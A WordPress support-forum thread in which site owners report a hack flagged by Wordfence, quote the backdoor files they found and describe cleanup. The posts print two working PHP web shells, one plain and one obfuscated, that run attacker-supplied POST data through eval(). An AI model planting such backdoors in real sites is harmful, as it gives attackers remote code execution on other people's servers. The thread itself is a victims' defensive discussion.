Possible Hack of my site

  • Resolved GreywolfComputer

    (@greywolfcomputer)


    10 years, 5 months ago

    Installed free WordFence to evaluate on a site that gets a lot of SPAM comments/emails. Other than the site appears to be working fine with not problems. I allowed Wordfence to scan and received warning on 12 files:

    This file may contain malicious executable code: This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans.

    I ftp’d my entire site folder to my computer to search through the files.

    Looking through the files, I see:

    <?php eval(base64_decode($_POST['nxxxxxx']));?>

    They are all the same line with the exception of what is between the ” They all start with “n” and have 6 letters and numbers after the “n”

    I searched for file names or code inside of files for the content between the ” and the only place it occurs is in these suspicious files.

    I’m still researching this as a possible hack; but need some advice.

    https://www.ads-software.com/plugins/wordfence/

Viewing 7 replies - 16 through 22 (of 22 total)

  • So, are we good now? Or still infected. Getting clean is the most important thing. ??

    tim

    Thread Starter GreywolfComputer

    (@greywolfcomputer)

    I’ve been checking a couple times a day on every site and I don’t see anything. WordFence says I’m clean. As does Sucuri. Also, other web scans from the outside. So, I’m going to cautiously say yes.

    Thread Starter GreywolfComputer

    (@greywolfcomputer)

    Here is something interesting. In checking the WordFence Live Traffic and setting up blocks, etc. I see that one of the domains — a wordpress install I currently have with a homepage with a “coming soon” type message — is getting attempts from Russia to access files in actual directories in my hosting account; but which don’t reside under the domain/wordpress folder for that domain. Ex: https://www.mydomain.com/folder-that-holds-wordpress-folder-for-other-domain/wp-includes/user.php That would tell me someone saw the folders on the hosting account. The chance they saw MY ftp credentials is almost nil because I am the only one who uses it, has access to the password, and I use VERY secure passwords from a password generator/management program.

    I bet you’re right. I’m still leaning towards making godaddy move you to another shared host. This one sounds like bad news.

    tim

    Thread Starter GreywolfComputer

    (@greywolfcomputer)

    I’m going to work on that. And, I think, move some wordpress installs to renamed folders just in case.

    I have this code in a php file on the wordpress root direcrtory: $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n2a3237'])) {eval($s21(${$s20}['n2a3237']));}?>

    file name is wp-izkbowe.php
    + another 2 wp-qzausdb.php and wp-myfcdlb.php but with 0 size

    manilLons

    (@manillons)

    Hi,

    Thank you for your help. I just had the same attack on my website.
    I used this plugin to find the infected files : WP Antivirus Site Protection (by SiteGuarding.com)
    The free version shows you the name the files but hide their paths. But with some search by name or date in filezilla it has been easy to find them all and delete them. Some wordpress core files were infected to (into wp-includes/). I had to replace them by some “new” ones from a clean wordpress download.

    More than 100 files to manage… but seems ok now. The more infected folders were backwpup, simplepie (that I didn’t remember to be installed…), tinymce, and revslider.

    Hope that helps.

Viewing 7 replies - 16 through 22 (of 22 total)
  • The topic ‘Possible Hack of my site’ is closed to new replies.